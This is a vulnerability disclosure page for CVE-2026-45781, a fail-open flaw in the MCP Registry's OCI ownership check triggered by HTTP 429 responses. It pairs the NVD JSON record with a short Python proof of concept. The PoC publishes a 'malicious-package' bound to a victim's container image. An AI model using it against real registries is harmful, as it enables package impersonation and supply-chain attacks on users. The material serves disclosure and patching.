CVE-2026-45781

import requests # Conceptual PoC for CVE-2026-45781 # This script demonstrates the logic where a rate limit (429) leads to a bypass. # In a real scenario, the attacker would flood the upstream registry or rely on existing limits. def publish_mcp_package(target_registry, namespace, malicious_image_uri): """ Simulates publishing a package to MCP Registry. """ payload = { "name": f"{namespace}/malicious-package", "oci_image": malicious_image_uri, "publisher_token": "attacker_auth_token" } # The MCP Registry attempts to validate the OCI image upstream. # If upstream returns 429, the vulnerable version accepts the publish. response = requests.post(f"{target_registry}/api/publish", json=payload) if response.status_code == 200: print("[+] Package published successfully (Validation Bypassed)") else: print("[-] Package publish failed") # Usage # publish_mcp_package("http://mcp-registry.com", "io.github.attacker", "ghcr.io/victim/legit-image:latest")

{"cve": {"id": "CVE-2026-45781", "sourceIdentifier": "[email protected]", "published": "2026-05-14T21:16:48.480", "lastModified": "2026-05-14T21:16:48.480", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The MCP Registry provides MCP clients with a list of MCP servers, like an app store for MCP servers. Prior to 1.7.9, OCI ownership validation skips label-match check when upstream OCI registry returns HTTP 429, letting any authenticated publisher bind their io.github.<user>/* namespace to OCI images they do not control. internal/validators/registries/oci.go:104-119 fails open on http.StatusTooManyRequests: when the registry's anonymous fetch to the upstream OCI registry is rate-limited, ValidateOCI returns nil and the publish is accepted without ever running the io.modelcontextprotocol.server.name label-match check at lines 122-141. That label check is the only cross-system ownership proof the registry applies to OCI packages — every other registry type (NPM, PyPI, NuGet, MCPB) treats a non-200 upstream response as a hard error. This vulnerability is fixed in 1.7.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-636"}]}], "references": [{"url": "https://github.com/modelcontextprotocol/registry/security/advisories/GHSA-2v5f-5r6w-p67r", "source": "[email protected]"}]}}